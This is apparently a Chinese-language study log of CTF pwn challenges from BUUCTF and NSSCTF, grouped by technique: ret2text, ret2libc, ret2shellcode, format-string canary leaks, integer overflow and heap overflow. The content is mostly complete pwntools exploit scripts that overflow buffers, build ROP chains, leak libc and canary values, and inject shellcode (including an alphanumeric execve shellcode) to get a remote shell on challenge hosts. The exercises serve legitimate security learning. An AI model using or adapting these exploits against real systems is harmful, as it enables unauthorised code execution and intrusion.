刷题网站

BUUCTF在线评测 (buuoj.cn)

主页 | NSSCTF

简单签到

  • 直接nc,cat flag系列
  • 稍微绕点弯子

题目1

ciscn_2019_n_8【BUUCTF】

题目2

[FSCTF 2023]nc | NSSCTF

ret2系列

  • 这个系列开是能动态调试就一定要动态调试,使用IDA静态调试出错的情况很多

ret2text

  • 简单ret2text
    • ret执行代码中的system函数
    • ret未使用的自定义函数的地址
  • 比较灵活的ret2text
    • 涉及到函数调用与动调有关的ret2text(ROP链编写)
    • 与其他知识融合(如与伪随机数融合等)

简单ret2text

题目1

[NUSTCTF 2022 新生赛]ezPwn | NSSCTF

题目2

攻防世界 (xctf.org.cn)pwnstack

题目3

[HNCTF 2022 WEEK2]ez_backdoor | NSSCTF

题目4(远程接收问题)

[NISACTF 2022]ezpie | NSSCTF

  • exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context.arch = 'i386'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'

elf = ELF('./ezpie')
#io = process('./ezpie')
#gdb.attach(io)
io = remote('node5.anna.nssctf.cn',28410)
io.recvuntil(b'gift!\n')
main_addr = io.recv(10)
main_addr = main_addr.decode('utf-8')
main_addr = int(main_addr,16)
print(main_addr)
shell_addr = main_addr + 0x80F - 0x770
payload = b'A'*0x28  + b'A'*0x4 + p32(shell_addr)
#io.recvuntil(b'input:\n')
io.sendline(payload)
io.interactive()

题目5

[MoeCTF 2021]ret2text | NSSCTF

  • exp:
1
2
3
4
5
6
7
from pwn import *
context(arch='amd64',os='Linux',endian='little',log_level = 'debug')

io = remote('node5.anna.nssctf.cn',29878)
payload = b'A'*0x12 + p64(0x40068B)
io.sendline(payload)
io.interactive()

比较灵活的ret2text

简单函数调用

题目1
  • 32位的函数调用规则

[NISACTF 2022]ezstack | NSSCTF

题目2

[SDCTF 2022]Horoscope | NSSCTF

  • exp:
1
2
3
4
5
6
7
from pwn import *
context(arch='amd64',os='Linux',endian='little',log_level = 'debug')

io = remote('node4.anna.nssctf.cn',28781)
payload = b'1/' + b'A'*0x2E + b'A'*0x8 + p64(0x40095F)
io.sendlineafter('horoscope\n',payload)
io.interactive()
题目3

[HGAME 2023 week1]easy_overflow | NSSCTF

  • exp:
1
2
3
4
5
6
from pwn import *
context(arch = 'amd64',os='Linux',endian='little',log_level='debug')
io = remote('node5.anna.nssctf.cn',27047)
payload = b'A'*0x18 + p64(0x401244)+p64(0x401176)
io.sendline(payload)
io.interactive()
  • 在输入cat flag之前需要输入exec 1>&0

需要写入sh

题目1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
context.arch = 'i386'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'
io = remote('node5.anna.nssctf.cn',24300)
#io = process('./ezr0p')

payload = b'/bin/sh\x00'
bin_addr = 0x804A080
sys_addr = 0x8048562
io.sendlineafter(b'name\n',payload)
payload2 = b'A'*0x1C + b'A'*0x4 + p32(sys_addr) + p32(bin_addr)
io.sendlineafter(b'time~\n', payload2)
io.interactive()

ret2libc

  • 简单:源程序中存在ROP链
  • 困难:源程序中不存在ROP链,但是libc程序中存在ROP链

题目1

[GHCTF 2024 新生赛]ez_ret2libc | NSSCTF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
context.arch = 'amd64'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28277)
#io = process('./ret2libc')

lib = ELF('./libc.so.6')
e = ELF('./ret2libc')
#gdb.attach(io)

puts = e.symbols['puts']
puts_got_plt = e.got['puts']
return_addr = e.symbols['dofunc']
sh = lib.search('/bin/sh')
sym = lib.symbols['system']
puts_offset = lib.symbols['puts']
print('%#x'%puts_offset)
system_offset = 0x522AB#sym
print('%#x'%system_offset)
bin_offset = 0x1B45BD
#bin_offset = 0x1B5ADC
# print(sh) #generator object ELF.search at 0x7f08d373d0e0
# print('%#x'%sym) # 0x52290
# print('%#x'%puts_got_plt) # 0x404018

pop_rdi_ret = 0x4012b3
pop_rsi_r15_ret = 0x4012b1

payload1 = b'a'*0x10 + p64(pop_rdi_ret) + p64(puts_got_plt) + p64(puts)
payload1 += p64(return_addr)
io.sendlineafter('input:\n',payload1)


io.recvuntil("bye.\n")
puts_addr = u64(io.recv(1).ljust(8,b'\x00'))
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print('puts_addr:',hex(puts_addr))
lib_addr = puts_addr - puts_offset
system_addr = lib_addr + system_offset
bin_addr = lib_addr + bin_offset



payload2 = b'a'*0x10 + p64(pop_rdi_ret) + p64(bin_addr) + p64(system_addr)
io.sendlineafter('input:\n',payload2)
print('lib_addr:',hex(lib_addr))
print('system_addr:',hex(system_addr))
print('bin_addr:',hex(bin_addr))
io.interactive()

题目2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
io = remote('node4.anna.nssctf.cn',28472)
#io = process('./ezlibc')
context.arch = 'i386'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'

e = ELF('./ezlibc')
libc = ELF('./libc-2.31.so')

#gdb.attach(io)
write = e.symbols['write']
write_got = 0x804c014 #e.got['write']
#print('%#x'%write_offset)
write_offset = 0xF05E0
bin_offset = 0x18B363
sys_offset = 0x41360
overflow = b'a'*0x14

payload1 = overflow + p32(write) + p32(0x80491B6) + p32(0x1) + p32(write_got) + p32(0x8)
io.sendlineafter('input:',payload1)

io.recvuntil('byebye')
write_addr = u32(io.recv(4).ljust(4,b'\x00'))
print('write_addr:',hex(write_addr))
libc = write_addr - write_offset
bin_addr = libc + bin_offset
sys_addr = libc + sys_offset

payload2 = overflow + p32(sys_addr) + p32(0xdeadbeef)+ p32(bin_addr)
io.sendlineafter('input:',payload2)
io.interactive()

题目3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
context.arch = 'amd64'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'
io = remote('node5.anna.nssctf.cn',28353)
#io = process('./ezrop64')
#gdb.attach(io)
elf = ELF('./ezrop64')
libc = ELF('./libc.so.6')
io.recvuntil(b'Easyrop.\n')
puts_addr = io.recv(20)[6:]
puts_offset = 0x80ED0
sys_offset = 0x50D7B
sh_offset = 0x1D8698
print(puts_addr)
puts_addr = puts_addr.decode('utf-8')
puts_addr = int(puts_addr,16)
libc_addr = puts_addr - puts_offset
print(puts_addr)
# 0x00000000004012a3 : pop rdi ; ret
pop_rdi_ret = 0x4012a3
sys_addr = libc_addr + sys_offset
sh_addr = libc_addr + sh_offset
payload = b'A'*0x108 + p64(pop_rdi_ret) + p64(sh_addr) + p64(sys_addr)
io.sendlineafter(b'rop.\n',payload)
io.interactive()

题目4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
context(arch='amd64',os='Linux',endian="little",log_level='debug')

io = remote('node5.anna.nssctf.cn', 25390)
io.sendline(b'1')
puts_offset = 0x809c0
put_got = 0x602020
put_plt = 0x4006E0
ret = 0x4006b9
sh_addr = 0x1b3e9a
sys_addr = 0x4f440
pop_rdi_ret = 0x400c83
encrypt = 0x4009A0
payload1 = b'A'*0x58 + p64(pop_rdi_ret) + p64(put_got) + p64(put_plt) + p64(encrypt)
io.sendlineafter(b'encrypted',payload1)
a = io.recvline()
b = io.recvline()
c = io.recvline()
puts_addr = io.recvline()
puts_addr = int.from_bytes(puts_addr[:6], byteorder='little')
print("puts_addr:",hex(puts_addr))
libc_addr = puts_addr - puts_offset
sys_addr = libc_addr + sys_addr
sh_addr = libc_addr + sh_addr
payload2 = b'A'*0x58 + p64(ret) + p64(pop_rdi_ret) + p64(sh_addr) + p64(sys_addr)
io.sendlineafter(b'encrypted',payload2)
io.interactive()
# 0x0000000000400c83 : pop rdi ; ret

题目5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
context(arch = 'amd64',os= 'Linux',endian='little',log_level='debug')
io= remote('node4.anna.nssctf.cn',28477)
pop_rdi=0x4007d3
sh_offset =0x1B45BD
sys_offset = 0x52290
puts_got = 0x601018
puts_plt = 0x400570
puts_offset= 0x84420
main_addr = 0x4006B0
ret = 0x400556
payload = b'A'*0x3f+b'\x00'+ b'A'*0x28 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt)+p64(main_addr)
io.sendlineafter(b'message:',payload)
io.recvuntil(b'\n')
a = io.recvline()
puts_addr = io.recvline()
puts_addr = int.from_bytes(puts_addr[:6], byteorder='little')
print("puts_addr--->>",hex(puts_addr))
libc = puts_addr -puts_offset
sh_addr = libc + sh_offset
sys_addr = libc + sys_offset
payload = b'A'*0x3f+b'\x00'+ b'A'*0x28 +p64(ret)+ p64(pop_rdi) + p64(sh_addr) + p64(sys_addr)
io.sendlineafter(b'message:',payload)
io.interactive()

题目6

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
context(arch = 'amd64',os='Linux',endian='little',log_level='debug')
p = remote('node4.anna.nssctf.cn',28051)
pop_rdi = 0x400753
ret = 0x400506
vuln = 0x400647
puts_offset = 0x84420
sys_offset = 0x52290
sh_offset = 0x1b45bd
puts_got = 0x600B38
puts_plt = 0x400520
payload = b'A'*0x68 + p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
p.sendline(payload)
a = p.recvline()
b = p.recvline()
c = p.recvline()
puts_addr = p.recv()
puts_addr = int.from_bytes(puts_addr[1:7],byteorder='little')
print('puts_addr--->',hex(puts_addr))
libc = puts_addr - puts_offset
sys_addr = libc + sys_offset
sh_addr = libc + sh_offset
payload = b'A'*0x68 +p64(ret)+p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
p.sendline(payload)
p.interactive()

ret2shellcode

题目1(写入shellcode)

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.arch = 'amd64'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'

io = remote('node5.anna.nssctf.cn',22150)
shellcode=asm(shellcraft.sh())
payload = shellcode + b'A'*0xD8 + p64(0x4040A0)
io.sendline(payload)
io.interactive()

题目2(可见字符shellcode)

1
2
3
4
5
6
7
8
9
10
from pwn import *
context.arch = 'amd64'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'

io = remote('node5.anna.nssctf.cn',21771)
shellcode=b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t\x00'payload = shellcode + b'A'*0x18A + p64(0x4040C0)
io.sendline(payload)
io.interactive()

题目3(自己写shellcode)

1
2
3
4
5
6
7
8
from  pwn import *
context(arch='amd64',os='Linux',endian='little',log_level='debug')
io = remote('node4.anna.nssctf.cn',28676)
shell = asm("mov rbx, 0x68732f6e69622f; push rbx; push rsp; pop rdi; xor esi, esi; xor edx, edx; push 0x3b; pop rax; syscall")
io.sendlineafter(b'Please.\n',shell)
payload = b'A'*0xA + b'A'*0x8 + p64(0x6010A0)
io.sendlineafter(b'start!\n',payload)
io.interactive()

shellcode是抄别人的 mov rbx, 0x68732f6e69622f; push rbx; push rsp; pop rdi; xor esi, esi; xor edx, edx; push 0x3b; pop rax; syscall

字符串格式化

简单格式化字符

题目1–(简单格式化字符利用)

image-20240426152509851

栈上格式化字符串

题目1(有canary)

题目来源:第一届帕鲁杯,PWN题Palu

  • exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
context.arch = 'amd64'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'
io = remote('192.168.240.1',54188)
#io = process('./Palu')
#gdb.attach(io)
e = ELF('./Palu')
decode = b'UGFsdQ=='
payload1 = b'%23$p\n%25$p'
io.sendlineafter(b'name\n',payload1)

canary = io.recvline()[2:]
leak_libc = io.recvline()[2:]
canary = int(canary,16)
leak_libc = int(leak_libc,16)
print(hex(leak_libc))
print(hex(canary))
libc_main = leak_libc - 240
libc_addr = libc_main - 0x20750
pop_rdi_ret = 0x4010a3
sh_addr = 0x18CE57 + libc_addr
sys_addr = 0x453A0 + libc_addr
io.sendlineafter(b'options\n',b'2')
io.sendlineafter(b'decode:',decode)
payload2 = b'A'*0x18 + p64(canary) + b'A'*0x8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(sys_addr)
io.sendlineafter(b'gift\n',payload2)
# %23$p
# 0x00000000004010a3 : pop rdi ; ret
# system 0x453A0
# /bin/sh 0x18CE57
io.interactive()

题目2(有canary)

  • [安洵杯 2021]stack | NSSCTF

  • 这题的格式化泄露main函数的基地址位置本地和远程不一样,远程是%17$p,本地是%15$p

  • exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
context(arch='amd64',os='Linux',endian='little',log_level='debug')
io = remote('node4.anna.nssctf.cn',28549)
#io = process('./ezstack')
io.sendline(b'%17$p\n%11$p')
leak_addr = io.recvline()[2:]
canary = io.recvline()[2:]
canary = int(canary,16)
leak_addr = int(leak_addr,16)
main_addr = leak_addr - 0x9DC
pop_rdi_ret = 0xb03
print(hex(leak_addr))
#gdb.attach(io)
payload = b'A'*0x18 + p64(canary)+ b'A'*0x8 + p64(main_addr + pop_rdi_ret) + p64(main_addr + 0xB24)+ p64(main_addr + 0xA8C)
io.sendlineafter(b'--',payload)
io.interactive()
# 0x0000000000000b03 : pop rdi ; ret

整数溢出

题目1

[NSSRound#16 Basic]ret_text | NSSCTF

题目2

[SWPUCTF 2022 新生赛]Integer Overflow | NSSCTF

  • exp:
1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context.arch = 'i386'
context.os = 'Linux'
context.endian = 'little'
context.log_level = 'debug'

io = remote("node5.anna.nssctf.cn",26890)
io.sendlineafter(b'choice:',b'1')
io.sendlineafter(b'name:',b'-1')
payload = b'A'*0x24 + p32(0x80494FB) + p32(0x804A008)
io.sendlineafter(b'0m',payload)
io.interactive()

伪随机数绕过

题目1

1
2
3
4
5
6
7
from pwn import *
context(arch = 'amd64',os = 'Linux',endian ='little',log_level= 'debug')
io = remote('node5.anna.nssctf.cn',25466)
io.send(b'1956681178')
payload = b'A'*(0x40+0x8) + p64(0x4008B2)
io.sendlineafter(b'next?',payload)
io.interactive()

有疑问的题目

题目1

[SWPUCTF 2023 秋季新生赛]签到 | NSSCTF

堆系列

堆溢出

题目1

[NISACTF 2022]ezheap | NSSCTF

  • exp:
1
2
3
4
5
6
from pwn import *
context(arch = 'i386',os='Linux',endian='little',log_level = 'debug')
io = remote('node5.anna.nssctf.cn',24184)
payload = b'A'*0x20 + b'/bin/sh\x00'
io.sendline(payload)
io.interactive()